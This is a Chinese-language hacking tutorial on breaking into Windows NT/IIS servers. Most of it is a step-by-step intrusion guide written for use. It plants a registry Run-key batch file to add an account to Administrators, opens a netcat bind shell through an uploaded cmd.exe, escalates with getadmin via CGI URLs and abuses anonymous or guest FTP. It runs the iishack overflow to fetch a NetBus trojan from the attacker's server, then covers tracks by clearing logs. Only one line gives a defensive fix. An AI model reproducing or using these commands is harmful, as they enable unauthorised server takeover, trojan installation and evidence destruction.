一、通過修改注冊表

凡是具有登錄NT本機的用戶，例如IUSR_machine，都具有對 HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run 項的可讀可寫權限，該用戶可以遠程訪問這個項。比如，他可以創建一個bat文件，文件內容為：cmd.exe /c net localgroup administrators IUSR_machine /add，把該文件copy到winnt目錄下，然后在注冊表上述的項添加一個數值，指向這個文件。

那么，當下次Admin登錄到該機器上時，就會自動把IUSR_machine添加到Administrators組。

另，注冊表鍵HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 也可以這么做。

二、自建Telnet服務在NT上執行指令

要求用戶有文件上傳權限，而且該目錄位于web目錄下，該目錄允許執行，下面是具體步驟。

假設你的目錄是www.xxx.com/frankie，那么，把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe傳到這個目錄上去。

然后，在瀏覽器端輸入：

http://www.xxx.com/frankie/cmd.e ... 20-t%20-e%20cmd.exe

這時候，你的瀏覽器將停止不動，實際上，Server上的Telnet的服務已經產生了。

這時，用Telnet連接www.xxx.com的23端口。你發現，不用密碼，不用登陸，對方C:\提示符已經出現在你的眼前！更妙的是，這個Telnet server是一個一次性的服務，當客戶端一退出，該服務也將終止。

Netcat不同于一般的特洛伊木馬，它可以構建任何的TCP連接服務。在瀏覽器端輸入上述的字符串，等價于在NT的Dos方式下輸入

nc -l -p 23 -t -e cmd.exe

三、入侵NTserver典型途徑V2.0

1、如果你有NT/IIS服務器的任何一個帳號，哪怕是guest帳號，都可以獲得root。

2、用Netcat和iishack可以獲得root。

3、Iusr_計算機名這個帳號有ftp上傳，web執行等權限。

4、在Web server上執行程序是入侵NT的關鍵。

5、要在Web server上執行程序就先要上傳文件到cgi-bin目錄或者scripts目錄等有執行權限的目錄上去。

在本文中，目標機器的名稱是ntsvr2，目標機器的域名是www.xxx.com，目標機器上有scripts和cgi-bin目錄，scripts目錄下有uploadn.asp等asp程序，可能有guest帳號，肯定有iusr_ntsvr2這個帳號。

第一個方法、用Iusr_ntsvr2后者Guest這兩個帳號

這里假設我們已經破解了這個帳號的密碼，在瀏覽器輸入：

http://www.xxx.com/scripts/uploadn.asp

然后輸入：

http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2

CGI Error

下面可以Add user：

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

http://www.xxx.com/scripts/getadmin.exe?china

第二個方法、用匿名Ftp

如果允許匿名帳號ftp登陸的設定，也給我們帶來了突破NT server的機會。我們用ftp登陸一個NT server，比如:www.xxx.com(示例名)：

ftp www.xxx.com 
Connected to www.xxx.com 
220 ntsvr2 Microsoft FTP Service (Version 3.0).

Ntsvr2這個東西暴露了其NETbios名，那么在IIS的背景下，必然會有一個IUSR_ntsvr2的用戶帳號，屬于Domain user組，這個帳號我們以后要用來獲取Administrator的權限。

User (www.xxx.com:(none)):anonymous 
331 Anonymous access allowed， send identity (e-mail name) as password.

Password：輸入 guest@ 或者guest。

對于缺乏網絡安全知識的管理員來說，很多人沒有將guest帳號禁止，或者沒有設置密碼。那么guest帳號就是一個可用的正確的用戶帳號，雖然只屬于Domain guest組。在這種情況下我們就可以進NT server的ftp了。

進去以后，看看目錄列表，試試 cd /scripts 或cgi-bin等關鍵目錄，如果運氣好，改變目錄成功，這時你就有了80%的把握。

把Winnt下的cmd.execopy到cgi-bin，把getadmin和gasys.dll傳上去到cgi-bin，然后輸入：

http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2

CGI Error

這時有90%的可能是：你已經把IUSR_ntsvr2升級為Administrator，也就是任何訪問該web站的人都是管理員。

下面可以add user：

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

http://www.xxx.com/cgi-bin/getadmin.exe?china

http://www.xxx.com/scripts/tools/getadmin.exe?china

你再用China的帳號登陸，就可以有最大的權限了，也可以用上面的cmd.exe的方法直接修改 如果沒有cmd.exe，也可以自己傳一個上去到scripts/tools或者cgi-bin目錄。

第三個方法、用netcat和iishack

如果你熟悉使用Netcat這個工具，你就知道，netcat可以利用NT的弱點在其上綁定端口，下面用eEye的工具已經介紹過，如果你熟悉Netcat，成功的可能性會更大。

IIS的ISAPI的毛病(*.HTR) 我們再來看看eEye最近這兩天發現的一個關于NT/IIS的問題和工具。在IIS的/Inetsrv目錄下，有個DLL文件叫ism.dll，這個模塊在web運行的時候就被加載到較高的內存地址，并且導致了零字節問題到處出現IIShack.asm，利用這個毛病，eEye寫了兩個程序：

iishack.exe 
ncx99.exe

為達目的你必須自己有一個web server，把ncx99.exe和netbus木馬傳到這個web server的目錄下，比如你的web server是：

www.mysvr.com? 而對方的IIS server是www.xxx.com

iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意，不要加http://字符!)

------(IIS 4.0 remote buffer overflow exploit)----------------- 
(c) dark spyrit -- barns@eeye.com. 
http://www.eEye.com 
[usage: iishack ] 
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe 
do not include 'http://' before hosts! 
--------------------------------------------------------------- 
Data sent!

然后，再把Netbus等特洛伊木馬傳到對方機器上去：

iishack www.example.com 80 www.myserver.com/netbus.exe

Telnet www.xxx.com 99

結果是這樣：

Microsoft(R) Windows NT(TM) 
(C) Copyright 1985-1996 Microsoft Corp. 

C:\>[You have full access to the system, happy browsing :)] 
C:\>[Add a scheduled task to restart inetinfo in X minutes] 
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes] 
C:\>[Clean up any trace or logs we might have left behind.]

補救方法：在IIS的www service屬性中將主目錄的應用程序設置的*.htr的映射刪除。

其它：用Retina.exe得到NT域內的帳號清單，逐個嘗試這些帳號，如果有的密碼薄弱而被你猜出來，就可以用上面的方法來獲取NT的Admin。

責任編輯 趙毅 zhaoyi#51cto.com TEL:（010）68476636-8001